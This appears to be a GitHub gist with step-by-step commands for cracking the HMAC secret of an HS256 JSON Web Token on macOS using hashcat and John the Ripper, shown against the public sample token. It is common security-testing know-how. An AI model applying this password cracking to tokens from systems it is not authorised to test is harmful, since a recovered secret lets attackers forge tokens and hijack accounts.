Skip to content

Instantly share code, notes, and snippets.

Embed
What would you like to do?
Crack JWT (HMAC) with HashCat/JohnTheRipper on MacOS
Target:
{
"alg": "HS256",
"typ": "JWT"
}
{
"sub": "1234567890",
"name": "John Doe",
"iat": 1516239022
}
$ echo -n 'eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiaWF0IjoxNTE2MjM5MDIyfQ.hWgU00w-Sq8jKHr7MD5DSUCMznj5GtHVARKNFgljc9A' > /tmp/jwt.hash
1. HashCat (v.4.1.0)
$ brew install hashcat
$ hashcat -h |grep JWT
16500 | JWT (JSON Web Token) | Network Protocols
$ hashcat -m 16500 /tmp/jwt.hash /path/to/wordlist.txt
...
eyJhbGciOiJ....GtHVARKNFgljc9A:p@ssw0rd
Session..........: hashcat
Status...........: Cracked
Hash.Type........: JWT (JSON Web Token)
...
2. john
; default john on Kali and MacOS's brew do not support JWT Cracking.
$ brew install gcc openssl
$ brew upgrade gcc
$ brew upgrade openssl
$ git clone https://github.com/Sjord/jwtcrack
$ cd jwtcrack/jwtcrack
$ python jwt2john.py eyJhbGciOiJI...c9A > /tmp/jwt.john
$ git clone https://github.com/magnumripper/JohnTheRipper
$ cd JohnTheRipper/src
$ ./configure CPPFLAGS="-I/usr/local/opt/openssl/include" LDFLAGS="-L/usr/local/opt/openssl/lib" --disable-pkg-config
$ make clean && make
$ make install
$ ../run/john /tmp/jwt.john --wordlist /path/to/wordlist.txt
3. don't use jwtcrack.py, it's suck.
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment